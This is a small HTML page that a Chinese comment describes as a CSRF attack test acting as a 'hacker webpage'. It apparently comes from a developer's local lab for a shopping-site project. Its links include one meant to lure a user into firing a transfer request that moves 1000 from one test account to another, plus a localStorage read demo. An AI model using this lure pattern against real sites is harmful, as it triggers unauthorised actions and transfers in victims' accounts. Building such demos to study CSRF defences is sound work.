<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <style>
        a {
            display: block;
        }
    </style>
<!--    <script src="https://jquery"></script>-->
    <script>
        function showName() {
            let name = localStorage.getItem('name')
            console.log('name:', name)
        }

        (function(){
            localStorage.setItem('name', 'Jack')
        })()

    </script>
</head>
<body>
<!--测试csrf攻击，此页面为黑客网页-->
<a href="http://localhost:10010/csrf/test" target="_blank">hello</a>
<a href="http://search.gmall.com:10010/csrf/test" target="_blank">world</a>
<a href="http://localhost:10001/logout.html" target="_blank">登出</a>
<a href="javascript:showName();">获取localStorage</a>
<a href="http://search.gmall.com:10010/csrf/test/transfer?from=zhangsan&to=lisi&amount=1000" target="_blank">诱导用户点击，发起csrf攻击</a>
</body>
</html>